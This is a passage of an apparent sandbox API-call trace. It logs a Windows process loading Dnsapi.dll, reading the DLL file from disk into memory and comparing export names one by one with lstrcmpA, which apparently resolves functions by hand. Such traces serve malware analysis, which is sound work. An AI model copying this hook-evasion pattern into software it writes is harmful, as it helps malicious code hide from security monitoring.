lpString2="CertAlgIdToOID") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0177.629] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0177.630] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0177.630] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0177.631] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0177.632] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0177.632] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0177.786] GetProcessHeap () returned 0x580000 [0177.786] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40b0040 | out: hHeap=0x580000) returned 1 [0177.796] GetProcessHeap () returned 0x580000 [0177.796] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5992a0 [0177.796] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0177.813] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0177.813] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0177.814] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0177.814] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0177.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0177.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0177.814] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0177.814] GetProcessHeap () returned 0x580000 [0177.814] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa7b88) returned 0x3a2d010 [0177.816] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0177.816] ReadFile (in: hFile=0x17c, lpBuffer=0x3a2d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a2d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0178.076] CloseHandle (hObject=0x17c) returned 1 [0178.076] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0178.077] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.077] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0178.077] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.077] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.077] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0178.077] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.077] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.077] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0178.077] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0178.077] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.077] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.077] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0178.077] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0178.077] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.078] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0178.078] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0178.078] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0178.078] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.078] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.078] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0178.078] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0178.078] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.079] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.079] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0178.079] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.079] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0178.080] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.081] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0178.082] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0178.082] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0178.083] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0178.083] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.084] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 